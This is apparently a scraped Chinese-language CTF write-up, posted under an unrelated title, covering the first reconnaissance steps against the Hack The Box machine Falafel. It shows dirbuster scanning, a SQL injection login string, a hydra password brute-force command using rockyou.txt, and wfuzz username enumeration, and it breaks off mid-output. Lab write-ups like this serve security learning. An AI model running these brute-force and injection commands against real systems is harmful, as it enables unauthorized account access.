string subscript out of bounds_超大字符集

string subscript out of bounds_超大字符集1扫描常规22可能ssh登录,80进web搜集信息

1扫描

常规22可能ssh登录,80进web搜集信息。

2web搜集

dirbuster扫,可以看到上传 php,应该是考上传。

进去看到登录框,按习惯第一反应输入admin,提示admin的密码错误,如果随便瞎输入用户名,提示try again。说明admin是存在的,以及让我们知道正确显示和错误显示报错机制是怎样的。因为这个涉及到hydra解密或者sql注入都需要这个。

先最简单的SQL注入试试admin' or '1'='1这些,没用,
再hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt falafel.htb http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong identification : admin" -t 64 

等了很久没结果,那应该考点不是这个解密。

再看看其他提示,dirbuster扫的其他结果,发现Cyberlaw.txt
在这里插入图片描述
说有chris用户,不用密码就搞定登录,那说明就是SQL注入,以及也说了上传拿shell。
用wfuzz看下还可能存在的用户名 -d后面的是从burp抓包的内容

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=abcd" -u http://10.10.10.73/login.php 

但是这个运行后会显示每个尝试的内容,不存在的用户编号是7074,,所以加上–hh 7074 这样只显示存在的用户,以免满屏都是。

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=abcd" -u http://10.10.10.73/login.php --hh 7074 

结果
就这俩。

C:\root> wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=abcd" -u http://10.10.10.73/login.php --hh 7074 Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.4 - The Web Fuzzer * **********

今天的文章
string subscript out of bounds_超大字符集分享到此就结束了,感谢您的阅读。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/61011.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注